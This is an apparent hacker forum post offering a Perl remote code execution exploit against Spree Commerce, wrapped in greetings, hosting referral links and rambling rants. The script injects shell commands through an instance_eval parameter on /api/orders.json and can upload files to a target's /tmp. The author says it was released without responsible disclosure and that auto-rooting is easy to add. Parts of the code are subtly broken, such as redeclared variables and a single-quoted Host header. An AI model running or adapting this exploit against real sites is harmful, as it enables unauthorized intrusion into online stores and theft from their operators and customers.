Well, since it is only a few months old now, and, we dont agree on things like, automating the scanner to *auto root* etc, BUT, we did make it so, it can run, with either infile (ip list) and, then th, it will kinda not be ready to make autorooting.. but, i guess this is a BIG ass bug yes..
#!/usr/bin/perl -w
# 01-21-2012
# Spreetime (r00t time) RCE exploit coded by
# xd / HaqNET (#Haxnet@EFNET) and peanuter / darpanet (#darpa@irc.darpanet.org)
##Spree Commerce Remote Code execution exploit and Options~
# greetz: to those who deserve them, all my friends
# from haxnet... the goods ones
#Greets: ac1db1tch3z <3 , all the hackerz on efnet, my channel specially, and the cool dudes and @ps in it,
#Mouse_ , Cypher- , bysin , l3th4l (smashthestack.org), Jason/zx2c4 , killerw0rm , bakO , 2Dcube , gaby, ALL
# albanian hax0rs! love yas! and evey biker around the net, hey, yea, we have some prescence here now!
#Yes ofcourse it is for money! what else would i be sittin here writin this sht for! cmon mate..
#and, even old notprix,the magician who appears, talks abit of bs, then disapears! hha
joking mate..
#I could not fit all the people really, there is to many, but, ofcourse the companys who help me to, Host Virtual
#Hosting 2 of my VPS, both in AWESOME EU countries where the standard is 100mbit and, it goes upto and into 400gig/s! Nice damn backbone and love the suppt.
# My affiliation there, would help you greatly: http://www.vr.org/aff.php?aff=551
#Also great box with Gtcomm: GloboTech Communications:
#www.gtcomm.net , USE Referral ID 5039 ,and basically helps me, and, you can even then be added faster, as usually are coming through a trusted/verified user,
#i dont know howmuch it really matters,but atleast shows them you have seen and, watched theyre ad or just been told, like this yes, ina fucking exploit!
# and 3 to fahmad / server4sale ,for his help with, and donated Dedicated box, wich is a Staminus one and, rather nice, i mean, this is one NICE guy with a huge
# heart, and, i admire him.. also LordNikon, i admire also, when he would stop changing his midn that is :s
#Now, ill let you to go have some phucking phun eh?
#thx to r0x0rel for pointing out the bugz in the first copy and ofc to the rest of haxnet....cheers!
# UNITED WE STAND, AONE , WE FALL! Yes, it is not worded the right way, thats coz, i like to be owiginwal.
#On behalf of the deceased/zombies and vampires, i think usa is now ready to tackle you guys! be careful now, your trolling for brain matter!
#peace to everyone, who i have pissed off lately..and, hopefully, you guys and i can just, chat things out and be done with the ctrap..seriously, i dont need it..and,
#i usually dont like to hand out exploit code like THiS ,but, i guess why not.. it was, there anyhow..
#To ALL troops stationed in afghanistan,pakistan,wherver other mitia advantageous points, well, go home. seriously, your fighting a war you simply will NOT win.
#Sorry that, the shitty governemts, have, been so, great with this, i mean sending mentally sound mass murdereng seargents in, is not theyre best move :s
#unfortunately for those living there, thats life...and, i can nly wish, that everyone is, at peace... or, atleast stoned ok?
#Now, it is time for my injections.. ak im late...see what happens >?
# XD coz BITCH IM WORLDIWDE
use strict;
use warnings;
use IO::Socket::INET;
use Getopt::Std;
use Storable;
getopt('cfdthlg'); ## here is the options.. you CAN remove thi, and set it to JUST scan single ip or,
## add in the scanning for/per subnet..and should be easy as! Ask ZmeU ,hes pretty cool wit that stuff! (GREETZ!)
sub Usage {
print "perl $0:\n"
print "These are your Options:\n"
. " -c Command - Issues command with parameters ..\n"
. " -f Filename - Uploads file to dir .. (/tmp by default) ..\n"
. " -d Directory - Specify dir to upload file to .. (/tmp by default) ..\n"
. " -t Target - Ip Address or Hostname/Domain\n" ## hence,we decided using this method.is very easy to add www-mechanize here.and maybe
##GOOD ForkManager for it,also a subnet setup,also it can scan -a/-b/-c if added in codeit..
. " -l Load [Load Pre-Compiled Command List using -g]\n"
. " -g Generate [Generate Pre-Compiled Command List]\n"
. " -h Help\n"
. "/t/t_-*Another HaqNET / Darpanet Production*-_";
exit(0);
}
our ( $opt_c, $opt_f, $opt_d, $opt_t, $opt_h, $opt_l, $opt_g );
Usage() unless $opt_c and $opt_t or $opt_f and $opt_t or $opt_l and $opt_t or $opt_g;
#Generate Pre-Compiled Command List (ie in file put uname -a ; id) etc..
if ($opt_g) {
print "-> What would you like to name the commands file: ";
my $filename = <STDIN>;
chomp $filename;
my ($command, @command, $command2);
while () {
print "-> Enter command(s) [done to finish]: ";
my $command2;
$command2 = <STDIN>;
chomp($command2);
if ($command2 =~ /done/) {
last;
}
my $command .= $command2;
}
my $commands = {
'commands' => [ @command ],
};
store(\$commands, $filename);
exit(0);
}
#Single command issue
if ($opt_c) {
#get command from console
my $cmd = $opt_c;
my $issue = 'cmd';
#send command to Build_Buffer
my $buffer = Build_Buffer( $issue, $cmd );
#send attack to socket
attack($issue, $buffer);
}
#Single File Upload
if ($opt_f) {
open( File, " < $opt_f " )
or die(" [-] Unable to open (ie: file.pl you just added to it): $opt_f\nError : $1 ");
my @file = <File>;
chomp @file;
foreach my $line (@file) {
my $issue = 'file';
#send line to Build_Buffer
Build_Buffer( $issue, $line );
}
}
#Stored Command List
if ($opt_l) {
my $Stored_Commands = retrieve("$opt_l");
foreach my $line ($Stored_Commands->commands) {
my $issue = 'commands';
#send commands to Build_Buffer
Build_Buffer( $issue, $line );
}
}
sub Build_Buffer {
my ($cmd_or_file, $line) = @_;
$line =~ s/\s/\%20/;
my $payload = undef;
#design payload
if ( $cmd_or_file =~ /cmd/ ) {
my $payload =
'/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. $line
. '%60end';
}
if ( $cmd_or_file =~ /file/) {
if ( $opt_d ) {
my $directory = $opt_d;
} else {
my $directory = '/tmp/';
#my $directory2 = '/proc/self/environ/; ## this is where id be headed
}
my $directory; #annoying strict issue ;\
my $payload = '/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. 'echo%20'
. $line
. '>>'
. $directory
. "/"
. $opt_f
. "%60end";
}
if ( $cmd_or_file =~ /commands/ ) {
my $payload = '/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. $line
. '%60end';
}
my $payload_length = length($payload);
my $host = $opt_t;
#create request
my $buffer =
'POST / HTTP/1.1' . "\n" .
'Host: $host' . "\n" .
'Keep-Alive: 300' . "\n" .
'Connection: Close' . "\n" .
'Referer: XD' . "\n" .
'Cookie: sid=1; testing=1;' . "\n" .
'Content-Type: plain/text' . "\n" .
'Length: ' . $payload_length . "\n\n" .
"$payload\n\n";
#send attack to socket
if ($cmd_or_file =~ /cmd/) {
return ($buffer);
}
if ($cmd_or_file =~ /file/) {
attack($cmd_or_file, $buffer);
}
if ($cmd_or_file =~ /commands/) {
attack($cmd_or_file, $buffer);
}
}
sub attack {
my ($cmd_or_file, $buffer) = @_;
my $host = $opt_t;
print " [+] Connecting to: $host\n ";
my $sock = IO::Socket::INET->new(
Proto => 'tcp',
PeerAddr => $host,
PeerPort => 80,
Timeout => 15
) or die(" [-] Unable to connect to: $host\nError : $! ");
if ($sock) {
print $sock $buffer;
print " [+] Buffer sent .. running our command .. \n ";
}
if ($cmd_or_file =~ /cmd/) {
while ( my $responce = $sock ) {
print "[!+!] Reply from: $host\n ";
print $responce;
}
exit(0);
}
}
About the exploit.. there is actually, a couple of them and, there is, this one wich can execute code nicely. on prettymuch any version i think.. am sure it might be patched now, but unsure wich versions/IS.and other bndled softwares thagt use Spree Commerce ( www.spreecommerce.com ).
We did agree, (me and peanuter that is), not to make it auto root, and, this was fine with me, and him, so, for those who CAN read, it is not hard atall to port anything for this, and, peanuter did a fine job of recioding it.. i have, another bug you could say, wich exists on the same page of code this bug is on..and since this is not a disclosure like normal ones, well hell… we dont have to follow ANY rules.
So what happened..why did it happen, so that it was NOT disclosed.. ok thats easy.. i made this bug PoC about 6 months ago, i dont know if, i was ted or what… anyhow, i used to keep ownage.pastebin.com (before they stopped subdomaining it) ,and well, thus was born the spree.pl ,in this time, a member from my efnet network channel #HaxNET , a member had tried to run and, there was one brace to many! well, shit onn me… anyhow, i fixed it up for him, but then realised, we had much more talented members than me in my channel for perkl =) Thats a no brainer.. but, i was NOT expecting it to be this guy.. hehehe, but, i welcomed peanuters sugestions, and, he was nice about things, and asked to *properly* do it..so, it went a cpl of diff versions, and, i know different attacks, were tested, on my end, for mutiiple vulnerabiliteies… anyhow, i could not figure if it was or not patched, and by this time it had sat on ownage. for about months,. and was very eay to see apparently :s
Anmyhow, that kinda, killed the chance of tryin to keep it quiet.. but, before it ended up on exploitdb or sum other silly archive site, id rather, showcase it and, the talent wich went into a small, yet, VERY nicely coded exploit. I only take credit for alittle of this now, as, it did undergo some changes, and, it has mutiple attack vectors, but, maybe you can poke around eh ? It aint so bad… only bit of php to readdd…
Anyhow, i like my friends, and, i like them to stay LOYAL ,and, i dont see this to much nowdays..I hope, by even releasing this to people, they can see that, even after *fights* with others, there can be full peace, and even a deeper understanding of the humane pshcye.
The Internet NOW,it is truly a place for geniuses, and, well, i know i am not one, but my Iq is not that of a pea , either.
hehe…anyhow, be brave and, fight the good fight!
Dont let fatassed burger eatin ppl annoy ya!~ Actually, make that, anyone… but, you know, my theme always has been, NO THUGGERY ONLINE! Still this is my belief,but, i also believe everyone has good inside them, and, this should be always looked at FIRST.
I hope, you find inner peace, just like the Dalai Lama, and then you even get to smoke weed, free! Ha! See, who said peace was bad… make a cult, get 10 wives, and shit, have a bigotting damn ghood time!’
now as for me, i have to doin-time.in , so, might not be around somuch… but, i will be sure, to look after those who looked after me when it was needed, and, for those who did NOT remain loyal..well, you should really, try and, make peace, and, stop even tencions…and, i mean this.. I mean one speail person, from Usa..and, i hope that, he can understand why i am who i am, and, thats just, a damn old man on the keys! hehe im 37, not 7, so, i dont see things as clearas, some younger people.. but damn, i see bad and good when i need to, and, i try alays to find that good nowdays, and, yea…sure it was awhile b4 i could act or be nice to anyone.. but, now, it seems normal for me to rant on like now and, feel GOOD about it, because, even if i make ONE person smile, it has made my day…
Enjoy!
XD / worldwide